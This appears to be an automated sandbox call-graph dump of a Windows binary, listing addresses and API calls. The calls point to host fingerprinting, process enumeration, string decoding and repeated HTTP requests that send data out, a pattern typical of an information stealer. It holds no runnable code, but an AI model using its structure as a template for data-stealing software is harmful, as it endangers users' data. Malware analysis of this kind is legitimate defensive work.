4037b1 76429->76430 76431 4047e8 3 API calls 76430->76431 76432 4037cb 76431->76432 76433 4047e8 3 API calls 76432->76433 76434 4037e2 76433->76434 76435 4047e8 3 API calls 76434->76435 76436 4037f6 76435->76436 76437 4047e8 3 API calls 76436->76437 76438 40380a 76437->76438 76439 4047e8 3 API calls 76438->76439 76440 403821 76439->76440 76441 4047e8 3 API calls 76440->76441 76442 403838 76441->76442 76443 4047e8 3 API calls 76442->76443 76444 40384f 76443->76444 76445 4047e8 3 API calls 76444->76445 76446 403866 76445->76446 76447 4047e8 3 API calls 76446->76447 76448 403880 76447->76448 76449 4047e8 3 API calls 76448->76449 76450 403897 76449->76450 76451 4047e8 3 API calls 76450->76451 76452 4038ae 76451->76452 76453 4047e8 3 API calls 76452->76453 76454 4038c5 76453->76454 76455 4047e8 3 API calls 76454->76455 76456 4038db 76455->76456 76457 4047e8 3 API calls 76456->76457 76458 4038f2 76457->76458 76459 4047e8 3 API calls 76458->76459 76460 403906 76459->76460 76461 4047e8 3 API calls 76460->76461 76462 40391d 76461->76462 76463 4047e8 3 API calls 76462->76463 76464 403937 76463->76464 76465 4047e8 3 API calls 76464->76465 76466 40394e 76465->76466 76467 4047e8 3 API calls 76466->76467 76468 403965 76467->76468 76469 4047e8 3 API calls 76468->76469 76470 40397c 76469->76470 76471 4047e8 3 API calls 76470->76471 76472 403993 76471->76472 76473 4047e8 3 API calls 76472->76473 76474 4039aa 76473->76474 76475 4047e8 3 API calls 76474->76475 76476 4039c1 76475->76476 76477 4047e8 3 API calls 76476->76477 76478 4039d8 76477->76478 76479 4047e8 3 API calls 76478->76479 76480 4039f2 76479->76480 76481 4047e8 3 API calls 76480->76481 76482 403a09 76481->76482 76483 4047e8 3 API calls 76482->76483 76484 403a20 76483->76484 76485 4047e8 3 API calls 76484->76485 76486 403a37 76485->76486 76487 4047e8 3 API calls 76486->76487 76488 403a4e 76487->76488 76489 4047e8 3 API calls 76488->76489 76490 403a65 76489->76490 76491 4047e8 3 API calls 76490->76491 76492 403a7c 76491->76492 76493 4047e8 3 API calls 76492->76493 76494 403a90 76493->76494 76495 4047e8 3 API calls 76494->76495 76496 403aaa 76495->76496 76497 4047e8 3 API calls 76496->76497 76498 403ac1 76497->76498 76499 4047e8 3 API calls 76498->76499 76500 403ad7 76499->76500 76501 4047e8 3 API calls 76500->76501 76502 403aee 76501->76502 76503 4047e8 3 API calls 76502->76503 76504 403b05 76503->76504 76505 4047e8 3 API calls 76504->76505 76506 403b1c 76505->76506 76507 4047e8 3 API calls 76506->76507 76508 403b33 76507->76508 76509 4047e8 3 API calls 76508->76509 76510 403b4a 76509->76510 76511 4047e8 3 API calls 76510->76511 76512 403b61 76511->76512 76513 4047e8 3 API calls 76512->76513 76514 403b75 76513->76514 76515 4047e8 3 API calls 76514->76515 76516 403b8c 76515->76516 76517 4047e8 3 API calls 76516->76517 76518 403ba3 76517->76518 76519 4047e8 3 API calls 76518->76519 76520 403bba 76519->76520 76521 4047e8 3 API calls 76520->76521 76522 403bd1 76521->76522 76523 4047e8 3 API calls 76522->76523 76524 403be8 76523->76524 76525 4047e8 3 API calls 76524->76525 76526 403bff 76525->76526 76527 4047e8 3 API calls 76526->76527 76528 403c19 76527->76528 76529 4047e8 3 API calls 76528->76529 76530 403c30 76529->76530 76531 4047e8 3 API calls 76530->76531 76532 403c47 76531->76532 76533 4047e8 3 API calls 76532->76533 76534 403c5e 76533->76534 76535 4047e8 3 API calls 76534->76535 76536 403c75 76535->76536 76537 4047e8 3 API calls 76536->76537 76538 403c8c 76537->76538 76539 4047e8 3 API calls 76538->76539 76540 403ca3 76539->76540 76541 4047e8 3 API calls 76540->76541 76542 403cb7 76541->76542 76543 4047e8 3 API calls 76542->76543 76544 403cd1 76543->76544 76545 4047e8 3 API calls 76544->76545 76546 403ce8 76545->76546 76547 4047e8 3 API calls 76546->76547 76548 403cff 76547->76548 76549 4047e8 3 API calls 76548->76549 76550 403d16 76549->76550 76551 4047e8 3 API calls 76550->76551 76552 403d2c 76551->76552 76553 4047e8 3 API calls 76552->76553 76554 403d43 76553->76554 76555 4047e8 3 API calls 76554->76555 76556 403d57 76555->76556 76557 4047e8 3 API calls 76556->76557 76558 403d6e 76557->76558 76559 4047e8 3 API calls 76558->76559 76560 403d85 76559->76560 76561 4047e8 3 API calls 76560->76561 76562 403d9c 76561->76562 76563 4047e8 3 API calls 76562->76563 76564 403db3 76563->76564 76565 4047e8 3 API calls 76564->76565 76566 403dca 76565->76566 76567 4047e8 3 API calls 76566->76567 76568 403de1 76567->76568 76569 4047e8 3 API calls 76568->76569 76570 403df8 76569->76570 76571 4047e8 3 API calls 76570->76571 76572 403e0f 76571->76572 76573 4047e8 3 API calls 76572->76573 76574 403e26 76573->76574 76575 4047e8 3 API calls 76574->76575 76576 403e40 76575->76576 76577 4047e8 3 API calls 76576->76577 76578 403e57 76577->76578 76579 4047e8 3 API calls 76578->76579 76580 403e6e 76579->76580 76581 4047e8 3 API calls 76580->76581 76582 403e84 76581->76582 76583 4047e8 3 API calls 76582->76583 76584 403e9b 76583->76584 76585 4047e8 3 API calls 76584->76585 76586 403eb2 76585->76586 76587 4047e8 3 API calls 76586->76587 76588 403ec9 76587->76588 76589 4047e8 3 API calls 76588->76589 76590 403ee0 76589->76590 76591 4047e8 3 API calls 76590->76591 76592 403efa 76591->76592 76593 4047e8 3 API calls 76592->76593 76594 403f10 76593->76594 76595 4047e8 3 API calls 76594->76595 76596 403f27 76595->76596 76597 4047e8 3 API calls 76596->76597 76598 403f3e 76597->76598 76599 4047e8 3 API calls 76598->76599 76600 403f55 76599->76600 76601 4047e8 3 API calls 76600->76601 76602 403f6c 76601->76602 76603 4047e8 3 API calls 76602->76603 76604 403f80 76603->76604 76605 4047e8 3 API calls 76604->76605 76606 403f97 76605->76606 76607 4047e8 3 API calls 76606->76607 76608 403fb1 76607->76608 76609 4047e8 3 API calls 76608->76609 76610 403fc7 76609->76610 76611 4047e8 3 API calls 76610->76611 76612 403fde 76611->76612 76613 4047e8 3 API calls 76612->76613 76614 403ff2 76613->76614 76615 4047e8 3 API calls 76614->76615 76616 404009 76615->76616 76617 4047e8 3 API calls 76616->76617 76618 404020 76617->76618 76619 4047e8 3 API calls 76618->76619 76620 404037 76619->76620 76621 4047e8 3 API calls 76620->76621 76622 40404e 76621->76622 76623 4047e8 3 API calls 76622->76623 76624 404067 76623->76624 76625 4047e8 3 API calls 76624->76625 76626 40407e 76625->76626 76627 4047e8 3 API calls 76626->76627 76628 404094 76627->76628 76629 4047e8 3 API calls 76628->76629 76630 4040a8 76629->76630 76631 4047e8 3 API calls 76630->76631 76632 4040bf 76631->76632 76633 4047e8 3 API calls 76632->76633 76634 4040d6 76633->76634 76635 4047e8 3 API calls 76634->76635 76636 4040ed 76635->76636 76637 4047e8 3 API calls 76636->76637 76638 404104 76637->76638 76639 4047e8 3 API calls 76638->76639 76640 40411e 76639->76640 76641 4047e8 3 API calls 76640->76641 76642 404135 76641->76642 76643 4047e8 3 API calls 76642->76643 76644 40414c 76643->76644 76645 4047e8 3 API calls 76644->76645 76646 404163 76645->76646 76647 4047e8 3 API calls 76646->76647 76648 404179 76647->76648 76649 4047e8 3 API calls 76648->76649 76650 40418d 76649->76650 76651 4047e8 3 API calls 76650->76651 76652 4041a1 76651->76652 76653 4047e8 3 API calls 76652->76653 76654 4041b8 76653->76654 76655 4047e8 3 API calls 76654->76655 76656 4041d2 76655->76656 76657 4047e8 3 API calls 76656->76657 76658 4041e8 76657->76658 76659 4047e8 3 API calls 76658->76659 76660 4041ff 76659->76660 76661 4047e8 3 API calls 76660->76661 76662 404216 76661->76662 76663 4047e8 3 API calls 76662->76663 76664 40422d 76663->76664 76665 4047e8 3 API calls 76664->76665 76666 404244 76665->76666 76667 4047e8 3 API calls 76666->76667 76668 404258 76667->76668 76669 4047e8 3 API calls 76668->76669 76670 40426e 76669->76670 76671 4047e8 3 API calls 76670->76671 76672 404288 76671->76672 76673 4047e8 3 API calls 76672->76673 76674 40429f 76673->76674 76675 4047e8 3 API calls 76674->76675 76676 4042b6 76675->76676 76677 4047e8 3 API calls 76676->76677 76678 4042cc 76677->76678 76679 4047e8 3 API calls 76678->76679 76680 4042e3 76679->76680 76681 4047e8 3 API calls 76680->76681 76682 4042fa 76681->76682 76683 4047e8 3 API calls 76682->76683 76684 404311 76683->76684 76685 4047e8 3 API calls 76684->76685 76686 404325 76685->76686 76687 4047e8 3 API calls 76686->76687 76688 40433c 76687->76688 76689 4047e8 3 API calls 76688->76689 76690 404353 76689->76690 76691 4047e8 3 API calls 76690->76691 76692 40436a 76691->76692 76693 4047e8 3 API calls 76692->76693 76694 404381 76693->76694 76695 4047e8 3 API calls 76694->76695 76696 404395 76695->76696 76697 4047e8 3 API calls 76696->76697 76698 4043ac 76697->76698 76699 4047e8 3 API calls 76698->76699 76700 4043c3 76699->76700 76701 4047e8 3 API calls 76700->76701 76702 4043da 76701->76702 76703 4047e8 3 API calls 76702->76703 76704 4043f1 76703->76704 76705 4047e8 3 API calls 76704->76705 76706 404408 76705->76706 76707 4047e8 3 API calls 76706->76707 76708 40441c 76707->76708 76709 4047e8 3 API calls 76708->76709 76710 404433 76709->76710 76711 4047e8 3 API calls 76710->76711 76712 40444a 76711->76712 76713 4047e8 3 API calls 76712->76713 76714 40445e 76713->76714 76715 4047e8 3 API calls 76714->76715 76716 404472 76715->76716 76717 4047e8 3 API calls 76716->76717 76718 404486 76717->76718 76719 4047e8 3 API calls 76718->76719 76720 4044a0 76719->76720 76721 4047e8 3 API calls 76720->76721 76722 4044b7 76721->76722 76723 4047e8 3 API calls 76722->76723 76724 4044cd 76723->76724 76725 4047e8 3 API calls 76724->76725 76726 4044e4 76725->76726 76727 4047e8 3 API calls 76726->76727 76728 4044fa 76727->76728 76729 4047e8 3 API calls 76728->76729 76730 404511 76729->76730 76731 4047e8 3 API calls 76730->76731 76732 404528 76731->76732 76733 4047e8 3 API calls 76732->76733 76734 40453e 76733->76734 76735 4047e8 3 API calls 76734->76735 76736 404558 76735->76736 76737 4047e8 3 API calls 76736->76737 76738 40456f 76737->76738 76739 4047e8 3 API calls 76738->76739 76740 404586 76739->76740 76741 4047e8 3 API calls 76740->76741 76742 40459d 76741->76742 76743 4047e8 3 API calls 76742->76743 76744 4045b4 76743->76744 76745 4047e8 3 API calls 76744->76745 76746 4045cb 76745->76746 76747 4047e8 3 API calls 76746->76747 76748 4045e2 76747->76748 76749 4047e8 3 API calls 76748->76749 76750 4045f9 76749->76750 76751 4047e8 3 API calls 76750->76751 76752 404612 76751->76752 76753 4047e8 3 API calls 76752->76753 76754 404629 76753->76754 76755 4047e8 3 API calls 76754->76755 76756 404642 76755->76756 76757 4047e8 3 API calls 76756->76757 76758 404656 76757->76758 76759 4047e8 3 API calls 76758->76759 76760 40466d 76759->76760 76761 4047e8 3 API calls 76760->76761 76762 404684 76761->76762 76763 4047e8 3 API calls 76762->76763 76764 40469b 76763->76764 76765 4047e8 3 API calls 76764->76765 76766 4046b2 76765->76766 76767 4047e8 3 API calls 76766->76767 76768 4046cc 76767->76768 76769 4047e8 3 API calls 76768->76769 76770 4046e3 76769->76770 76771 4047e8 3 API calls 76770->76771 76772 4046f9 76771->76772 76773 4047e8 3 API calls 76772->76773 76774 404710 76773->76774 76775 4047e8 3 API calls 76774->76775 76776 404727 76775->76776 76777 4047e8 3 API calls 76776->76777 76778 40473d 76777->76778 76779 4047e8 3 API calls 76778->76779 76780 404754 76779->76780 76781 4047e8 3 API calls 76780->76781 76782 404768 76781->76782 76783 4047e8 3 API calls 76782->76783 76784 404781 76783->76784 76785 4047e8 3 API calls 76784->76785 76786 404797 76785->76786 76787 4047e8 3 API calls 76786->76787 76788 4047ae 76787->76788 76789 4047e8 3 API calls 76788->76789 76790 4047c5 76789->76790 76791 4047e8 3 API calls 76790->76791 76792 4047dc 76791->76792 76792->75800 78111 42f109 76793->78111 76795 41258e CreateToolhelp32Snapshot Process32First 76796 4125c2 Process32Next 76795->76796 76797 4125ef CloseHandle 76795->76797 76796->76797 76798 4125d4 StrCmpCA 76796->76798 78112 42f165 76797->78112 76798->76796 76800 4125e6 76798->76800 76800->76796 76803 4104e7 lstrcpyA 76802->76803 76804 411c67 76803->76804 76805 4104e7 lstrcpyA 76804->76805 76806 411c75 GetSystemTime 76805->76806 76807 411c91 76806->76807 76808 41d016 __setmbcp_nolock 5 API calls 76807->76808 76809 411cc8 76808->76809 76809->75807 76812 4105e1 76810->76812 76811 410605 76811->75822 76812->76811 76813 4105f3 lstrcpyA lstrcatA 76812->76813 76813->76811 76815 410519 lstrcpyA 76814->76815 76816 401d07 76815->76816 76817 410519 lstrcpyA 76816->76817 76818 401d12 76817->76818 76819 410519 lstrcpyA 76818->76819 76820 401d1d 76819->76820 76821 410519 lstrcpyA 76820->76821 76822 401d34 76821->76822 76823 4169b6 76822->76823 76824 410549 2 API calls 76823->76824 76825 4169ec 76824->76825 76826 410549 2 API calls 76825->76826 76827 4169f9 76826->76827 76828 410549 2 API calls 76827->76828 76829 416a06 76828->76829 76830 4104e7 lstrcpyA 76829->76830 76831 416a13 76830->76831 76832 4104e7 lstrcpyA 76831->76832 76833 416a20 76832->76833 76834 4104e7 lstrcpyA 76833->76834 76835 416a2d 76834->76835 76836 4104e7 lstrcpyA 76835->76836 76837 416a3a 76836->76837 76838 4104e7 lstrcpyA 76837->76838 76839 416a47 76838->76839 76840 4104e7 lstrcpyA 76839->76840 76896 416a54 76840->76896 76843 416a98 StrCmpCA 76844 416af1 StrCmpCA 76843->76844 76843->76896 76845 416cd4 76844->76845 76844->76896 76848 41058d lstrcpyA 76845->76848 76849 416cdf 76848->76849 76851 4104e7 lstrcpyA 76849->76851 76852 416cec 76851->76852 76854 41058d lstrcpyA 76852->76854 76853 401cfd lstrcpyA 76853->76896 76889 416c2c 76854->76889 76855 4168c6 33 API calls 76855->76896 76856 41058d lstrcpyA 76856->76896 76857 4104e7 lstrcpyA 76858 416d0b 76857->76858 76860 41058d lstrcpyA 76858->76860 76859 416b51 StrCmpCA 76861 416baa StrCmpCA 76859->76861 76859->76896 76862 416d15 76860->76862 76863 416bc0 StrCmpCA 76861->76863 76864 416ca3 76861->76864 78124 416da2 76862->78124 76867 416c72 76863->76867 76868 416bd6 StrCmpCA 76863->76868 76866 41058d lstrcpyA 76864->76866 76869 416cae 76866->76869 76873 41058d lstrcpyA 76867->76873 76870 416be8 StrCmpCA 76868->76870 76871 416c3e 76868->76871 76875 4104e7 lstrcpyA 76869->76875 76876 416c0a 76870->76876 76877 416bfa Sleep 76870->76877 76879 41058d lstrcpyA 76871->76879 76872 410519 lstrcpyA 76872->76896 76878 416c7d 76873->76878 76880 416cbb 76875->76880 76881 41058d lstrcpyA 76876->76881 76877->76896 76882 4104e7 lstrcpyA 76878->76882 76883 416c49 76879->76883 76885 41058d lstrcpyA 76880->76885 76886 416c15 76881->76886 76887 416c8a 76882->76887 76884 4104e7 lstrcpyA 76883->76884 76888 416c56 76884->76888 76885->76889 76890 4104e7 lstrcpyA 76886->76890 76892 41058d lstrcpyA 76887->76892 76893 41058d lstrcpyA 76888->76893 76889->76857 76894 416c22 76890->76894 76891 41683e 28 API calls 76891->76896 76892->76889 76893->76889 76895 41058d lstrcpyA 76894->76895 76895->76889 76896->76843 76896->76844 76896->76853 76896->76855 76896->76856 76896->76859 76896->76861 76896->76872 76896->76891 78115 4029f8 76896->78115 78118 402a09 76896->78118 78121 402a1a 76896->78121 78131 402a2b lstrcpyA 76896->78131 78132 402a3c lstrcpyA 76896->78132 78133 402a4d lstrcpyA 76896->78133 76897 416d28 76897->75833 76899 41058d lstrcpyA 76898->76899 76900 418257 76899->76900 76901 41058d lstrcpyA 76900->76901 76902 418262 76901->76902 76903 41058d lstrcpyA 76902->76903 76904 41826d 76903->76904 76904->75837 76906 410529 76905->76906 76907 41053e 76906->76907 76908 410536 lstrcpyA 76906->76908 76907->75850 76908->76907 76910 4109e6 GetVolumeInformationA 76909->76910 76911 4109df 76909->76911 76912 410a4d 76910->76912 76911->76910 76912->76912 76913 410a62 GetProcessHeap HeapAlloc 76912->76913 76914 410a7d 76913->76914 76915 410a8c wsprintfA lstrcatA 76913->76915 76916 4104e7 lstrcpyA 76914->76916 78134 411684 GetCurrentHwProfileA 76915->78134 76918 410a85 76916->76918 76922 41d016 __setmbcp_nolock 5 API calls 76918->76922 76919 410ac7 lstrlenA 78150 4123d5 lstrcpyA malloc strncpy 76919->78150 76921 410aea lstrcatA 76924 410b01 76921->76924 76923 410b2e 76922->76923 76923->75877 76925 4104e7 lstrcpyA 76924->76925 76926 410b18 76925->76926 76926->76918 76928 410519 lstrcpyA 76927->76928 76929 404b59 76928->76929 78154 404ab6 76929->78154 76931 404b65 76932 4104e7 lstrcpyA 76931->76932 76933 404b81 76932->76933 76934 4104e7 lstrcpyA 76933->76934 76935 404b91 76934->76935 76936 4104e7 lstrcpyA 76935->76936 76937 404ba1 76936->76937 76938 4104e7 lstrcpyA 76937->76938 76939 404bb1 76938->76939 76940 4104e7 lstrcpyA 76939->76940 76941 404bc1 InternetOpenA StrCmpCA 76940->76941 76942 404bf5 76941->76942 76943 405194 InternetCloseHandle 76942->76943 76944 411c4a 7 API calls 76942->76944 76954 4051e1 76943->76954 76945 404c15 76944->76945 76946 4105c7 2 API calls 76945->76946 76947 404c28 76946->76947 76948 41058d lstrcpyA 76947->76948 76949 404c33 76948->76949 76950 410609 3 API calls 76949->76950 76951 404c5f 76950->76951 76952 41058d lstrcpyA 76951->76952 76953 404c6a 76952->76953 76955 410609 3 API calls 76953->76955 76956 41d016 __setmbcp_nolock 5 API calls 76954->76956 76957 404c8b 76955->76957 76958 405235 76956->76958 76959 41058d lstrcpyA 76957->76959 77060 4139c2 StrCmpCA 76958->77060 76960 404c96 76959->76960 76961 4105c7 2 API calls 76960->76961 76962 404cb8 76961->76962 76963 41058d lstrcpyA 76962->76963 76964 404cc3 76963->76964 76965 410609 3 API calls 76964->76965 76966 404ce4 76965->76966 76967 41058d lstrcpyA 76966->76967 76968 404cef 76967->76968 76969 410609 3 API calls 76968->76969 76970 404d10 76969->76970 76971 41058d lstrcpyA 76970->76971 76972 404d1b 76971->76972 76973 410609 3 API calls 76972->76973 76974 404d3d 76973->76974 76975 4105c7 2 API calls 76974->76975 76976 404d48 76975->76976 76977 41058d lstrcpyA 76976->76977 76978 404d53 76977->76978 76979 404d69 InternetConnectA 76978->76979 76979->76943 76980 404d97 HttpOpenRequestA 76979->76980 76981 404dd7 76980->76981 76982 405188 InternetCloseHandle 76980->76982 76983 404dfb 76981->76983 76984 404ddf InternetSetOptionA 76981->76984 76982->76943 76985 410609 3 API calls 76983->76985 76984->76983 76986 404e11 76985->76986 76987 41058d lstrcpyA 76986->76987 76988 404e1c 76987->76988 76989 4105c7 2 API calls 76988->76989 76990 404e3e 76989->76990 76991 41058d lstrcpyA 76990->76991 76992 404e49 76991->76992 76993 410609 3 API calls 76992->76993 76994 404e6a 76993->76994 76995 41058d lstrcpyA 76994->76995 76996 404e75 76995->76996 76997 410609 3 API calls 76996->76997 76998 404e97 76997->76998 76999 41058d lstrcpyA 76998->76999 77000 404ea2 76999->77000 77001 410609 3 API calls 77000->77001 77002 404ec3 77001->77002 77003 41058d lstrcpyA 77002->77003 77004 404ece 77003->77004 77005 410609 3 API calls 77004->77005 77006 404eef 77005->77006 77007 41058d lstrcpyA 77006->77007 77008 404efa 77007->77008 77009 4105c7 2 API calls 77008->77009 77010 404f19 77009->77010 77011 41058d lstrcpyA 77010->77011 77012 404f24 77011->77012 77013 410609 3 API calls 77012->77013 77014 404f45 77013->77014 77015 41058d lstrcpyA 77014->77015 77016 404f50 77015->77016 77017 410609 3 API calls 77016->77017 77018 404f71 77017->77018 77019 41058d lstrcpyA 77018->77019 77020 404f7c 77019->77020 77021 4105c7 2 API calls 77020->77021 77022 404f9e 77021->77022 77023 41058d lstrcpyA 77022->77023 77024 404fa9 77023->77024 77025 410609 3 API calls 77024->77025 77026 404fca 77025->77026 77027 41058d lstrcpyA 77026->77027 77028 404fd5 77027->77028 77029 410609 3 API calls 77028->77029 77030 404ff7 77029->77030 77031 41058d lstrcpyA 77030->77031 77032 405002 77031->77032 77033 410609 3 API calls 77032->77033 77034 405023 77033->77034 77035 41058d lstrcpyA 77034->77035 77036 40502e 77035->77036 77037 410609 3 API calls 77036->77037 77038 40504f 77037->77038 77039 41058d lstrcpyA 77038->77039 77040 40505a 77039->77040 77041 4105c7 2 API calls 77040->77041 77042 405079 77041->77042 77043 41058d lstrcpyA 77042->77043 77044 405084 77043->77044 77045 4104e7 lstrcpyA 77044->77045 77046 40509f 77045->77046 77047 4105c7 2 API calls 77046->77047 77048 4050b6 77047->77048 77049 4105c7 2 API calls 77048->77049 77050 4050c7 77049->77050 77051 41058d lstrcpyA 77050->77051 77052 4050d2 77051->77052 77053 4050e8 lstrlenA lstrlenA HttpSendRequestA 77052->77053 77054 40515c InternetReadFile 77053->77054 77055 405176 InternetCloseHandle 77054->77055 77058 40511c 77054->77058 77056 402920 77055->77056 77056->76982 77057 410609 3 API calls 77057->77058 77058->77054 77058->77055 77058->77057 77059 41058d lstrcpyA 77058->77059 77059->77058 77061 4139e1 ExitProcess 77060->77061 77062 4139e8 strtok_s 77060->77062 77063 413b48 77062->77063 77075 413a04 77062->77075 77063->75885 77064 413b2a strtok_s 77064->77063 77064->77075 77065 413a21 StrCmpCA 77065->77064 77065->77075 77066 413a75 StrCmpCA 77066->77064 77066->77075 77067 413ab4 StrCmpCA 77067->77064 77067->77075 77068 413af4 StrCmpCA 77068->77064 77069 413b16 StrCmpCA 77069->77064 77070 413a59 StrCmpCA 77070->77064 77070->77075 77071 413ac9 StrCmpCA 77071->77064 77071->77075 77072 413a3d StrCmpCA 77072->77064 77072->77075 77073 413a9f StrCmpCA 77073->77064 77073->77075 77074 413ade StrCmpCA 77074->77064 77075->77064 77075->77065 77075->77066 77075->77067 77075->77068 77075->77069 77075->77070 77075->77071 77075->77072 77075->77073 77075->77074 77076 410549 2 API calls 77075->77076 77076->77075 77078 410519 lstrcpyA 77077->77078 77079 405f64 77078->77079 77080 404ab6 5 API calls 77079->77080 77081 405f70 77080->77081 77082 4104e7 lstrcpyA 77081->77082 77083 405f8c 77082->77083 77084 4104e7 lstrcpyA 77083->77084 77085 405f9c 77084->77085 77086 4104e7 lstrcpyA 77085->77086 77087 405fac 77086->77087 77088 4104e7 lstrcpyA 77087->77088 77089 405fbc 77088->77089 77090 4104e7 lstrcpyA 77089->77090 77091 405fcc InternetOpenA StrCmpCA 77090->77091 77092 406000 77091->77092 77093 4066ff InternetCloseHandle 77092->77093 77094 411c4a 7 API calls 77092->77094 78160 408048 CryptStringToBinaryA 77093->78160 77097 406020 77094->77097 77098 4105c7 2 API calls 77097->77098 77099 406033 77098->77099 77101 41058d lstrcpyA 77099->77101 77100 410549 2 API calls 77102 406739 77100->77102 77106 40603e 77101->77106 77103 410609 3 API calls 77102->77103 77104 406750 77103->77104 77105 41058d lstrcpyA 77104->77105 77111 40675b 77105->77111 77107 410609 3 API calls 77106->77107 77108 40606a 77107->77108 77109 41058d lstrcpyA 77108->77109 77110 406075 77109->77110 77114 410609 3 API calls 77110->77114 77112 41d016 __setmbcp_nolock 5 API calls 77111->77112 77113 4067eb 77112->77113 77244 41343f strtok_s 77113->77244 77115 406096 77114->77115 77116 41058d lstrcpyA 77115->77116 77117 4060a1 77116->77117 77118 4105c7 2 API calls 77117->77118 77119 4060c3 77118->77119 77120 41058d lstrcpyA 77119->77120 77121 4060ce 77120->77121 77122 410609 3 API calls 77121->77122 77123 4060ef 77122->77123 77124 41058d lstrcpyA 77123->77124 77125 4060fa 77124->77125 77126 410609 3 API calls 77125->77126 77127 40611b 77126->77127 77128 41058d lstrcpyA 77127->77128 77129 406126 77128->77129 77130 410609 3 API calls 77129->77130 77131 406148 77130->77131 77132 4105c7 2 API calls 77131->77132 77133 406153 77132->77133 77134 41058d lstrcpyA 77133->77134 77135 40615e 77134->77135 77136 406174 InternetConnectA 77135->77136 77136->77093 77137 4061a2 HttpOpenRequestA 77136->77137 77138 4061e2 77137->77138 77139 4066f3 InternetCloseHandle 77137->77139 77140 406206 77138->77140 77141 4061ea InternetSetOptionA 77138->77141 77139->77093 77142 410609 3 API calls 77140->77142 77141->77140 77143 40621c 77142->77143 77144 41058d lstrcpyA 77143->77144 77145 406227 77144->77145 77146 4105c7 2 API calls 77145->77146 77147 406249 77146->77147 77148 41058d lstrcpyA 77147->77148 77149 406254 77148->77149 77150 410609 3 API calls 77149->77150 77151 406275 77150->77151 77152 41058d lstrcpyA 77151->77152 77153 406280 77152->77153 77154 410609 3 API calls 77153->77154 77155 4062a2 77154->77155 77156 41058d lstrcpyA 77155->77156 77157 4062ad 77156->77157 77158 410609 3 API calls 77157->77158 77159 4062cf 77158->77159 77160 41058d lstrcpyA 77159->77160 77161 4062da 77160->77161 77162 410609 3 API calls 77161->77162 77163 4062fb 77162->77163 77164 41058d lstrcpyA 77163->77164 77165 406306 77164->77165 77166 4105c7 2 API calls 77165->77166 77167 406325 77166->77167 77168 41058d lstrcpyA 77167->77168 77169 406330 77168->77169 77170 410609 3 API calls 77169->77170 77171 406351 77170->77171 77172 41058d lstrcpyA 77171->77172 77173 40635c 77172->77173 77174 410609 3 API calls 77173->77174 77175 40637d 77174->77175 77176 41058d lstrcpyA 77175->77176 77177 406388 77176->77177 77178 4105c7 2 API calls 77177->77178 77179 4063aa 77178->77179 77180 41058d lstrcpyA 77179->77180 77181 4063b5 77180->77181 77182 410609 3 API calls 77181->77182 77183 4063d6 77182->77183 77184 41058d lstrcpyA 77183->77184 77185 4063e1 77184->77185 77186 410609 3 API calls 77185->77186 77187 406403 77186->77187 77188 41058d lstrcpyA 77187->77188 77189 40640e 77188->77189 77190 410609 3 API calls 77189->77190 77191 40642f 77190->77191 77192 41058d lstrcpyA 77191->77192 77193 40643a 77192->77193 77194 410609 3 API calls 77193->77194 77195 40645b 77194->77195 77196 41058d lstrcpyA 77195->77196 77197 406466 77196->77197 77198 410609 3 API calls 77197->77198 77199 406487 77198->77199 77200 41058d lstrcpyA 77199->77200 77201 406492 77200->77201 77202 410609 3 API calls 77201->77202 77203 4064b3 77202->77203 77204 41058d lstrcpyA 77203->77204 77205 4064be 77204->77205 77206 410609 3 API calls 77205->77206 77207 4064df 77206->77207 77208 41058d lstrcpyA 77207->77208 77209 4064ea 77208->77209 77210 4105c7 2 API calls 77209->77210 77211 406506 77210->77211 77212 41058d lstrcpyA 77211->77212 77213 406511 77212->77213 77214 410609 3 API calls 77213->77214 77215 406532 77214->77215 77216 41058d lstrcpyA 77215->77216 77217 40653d 77216->77217 77218 410609 3 API calls 77217->77218 77219 40655f 77218->77219 77220 41058d lstrcpyA 77219->77220 77221 40656a 77220->77221 77222 410609 3 API calls 77221->77222 77223 40658b 77222->77223 77224 41058d lstrcpyA 77223->77224 77225 406596 77224->77225 77226 410609 3 API calls 77225->77226 77227 4065b7 77226->77227 77228 41058d lstrcpyA 77227->77228 77229 4065c2 77228->77229 77230 4105c7 2 API calls 77229->77230 77231 4065e1 77230->77231 77232 41058d lstrcpyA 77231->77232 77233 4065ec 77232->77233 77234 4065f7 lstrlenA lstrlenA GetProcessHeap HeapAlloc lstrlenA 77233->77234 78158 427050 77234->78158 77236 40663e lstrlenA lstrlenA 77237 427050 _memmove 77236->77237 77238 406667 lstrlenA HttpSendRequestA 77237->77238 77239 4066d2 InternetReadFile 77238->77239 77240 4066ec InternetCloseHandle 77239->77240 77242 406692 77239->77242 77240->77139 77241 410609 3 API calls 77241->77242 77242->77239 77242->77240 77242->77241 77243 41058d lstrcpyA 77242->77243 77243->77242 77245 4134cc 77244->77245 77249 41346e 77244->77249 77245->75900 77246 410549 2 API calls 77247 4134b6 strtok_s 77246->77247 77247->77245 77247->77249 77248 410549 2 API calls 77248->77249 77249->77246 77249->77247 77249->77248 77258 413286 77250->77258 77251 413332 StrCmpCA 77251->77258 77252 413385 77252->75913 77253 410549 2 API calls 77253->77258 77254 413367 strtok_s 77254->77258 77255 413301 StrCmpCA 77255->77258 77256 4132dc StrCmpCA 77256->77258 77257 4132ab StrCmpCA 77257->77258 77258->77251 77258->77252 77258->77253 77258->77254 77258->77255 77258->77256 77258->77257 77260 413434 77259->77260 77262 4133bc 77259->77262 77260->75926 77261 4133e2 StrCmpCA 77261->77262 77262->77261 77263 410549 2 API calls 77262->77263 77264 41341a strtok_s 77262->77264 77265 410549 2 API calls 77262->77265 77263->77264 77264->77260 77264->77262 77265->77262 77267 4104e7 lstrcpyA 77266->77267 77268 413b9f 77267->77268 77269 410609 3 API calls 77268->77269 77270 413baf 77269->77270 77271 41058d lstrcpyA 77270->77271 77272 413bb7 77271->77272 77273 410609 3 API calls 77272->77273 77274 413bcf 77273->77274 77275 41058d lstrcpyA 77274->77275 77276 413bd7 77275->77276 77277 410609 3 API calls 77276->77277 77278 413bef 77277->77278 77279 41058d lstrcpyA 77278->77279 77280 413bf7 77279->77280 77281 410609 3 API calls 77280->77281 77282 413c0f 77281->77282 77283 41058d lstrcpyA 77282->77283 77284 413c17 77283->77284 77285 410609 3 API calls 77284->77285 77286 413c2f 77285->77286 77287 41058d lstrcpyA 77286->77287 77288 413c37 77287->77288 78165 410cc0 GetProcessHeap HeapAlloc GetLocalTime wsprintfA 77288->78165 77291 410609 3 API calls 77292 413c50 77291->77292 77293 41058d lstrcpyA 77292->77293 77294 413c58 77293->77294 77295 410609 3 API calls 77294->77295 77296 413c70 77295->77296 77297 41058d lstrcpyA 77296->77297 77298 413c78 77297->77298 77299 410609 3 API calls 77298->77299 77300 413c90 